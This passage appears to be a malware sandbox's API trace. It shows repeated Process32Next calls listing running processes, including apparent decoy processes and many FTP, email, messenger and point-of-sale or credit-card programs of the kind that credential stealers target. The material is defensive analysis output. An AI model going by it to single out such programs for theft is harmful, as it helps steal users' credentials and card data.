hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0272.478] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.479] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.624] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.626] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.628] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.630] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.633] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.635] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0272.637] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0272.648] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0272.668] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.670] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0272.672] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0272.674] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0272.676] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0272.678] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.680] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0272.682] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0272.684] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0272.772] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0272.774] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0272.775] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0272.783] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0272.785] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0272.787] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0272.790] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0272.792] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0272.797] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0272.799] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0272.801] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0272.803] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0272.804] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0272.806] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0272.808] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0272.814] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0272.816] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0272.818] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0272.819] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0272.821] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0272.822] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0272.824] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0272.989] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0272.990] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0272.992] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0272.994] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0272.995] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0273.000] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0273.002] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0273.005] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0273.007] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0273.009] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0273.011] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0273.047] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0273.049] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0273.051] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0273.053] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0273.055] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0273.056] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0273.058] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0273.171] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0273.173] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0273.176] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0273.178] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0273.180] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0273.182] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0273.189] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0273.192] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0273.194] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0273.196] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0273.198] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0273.200] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0273.202] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0273.203] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0273.206] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0273.208] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0273.210] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0273.212] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0273.219] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0273.220] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0273.222] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0273.224] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0273.225] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0273.227] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, 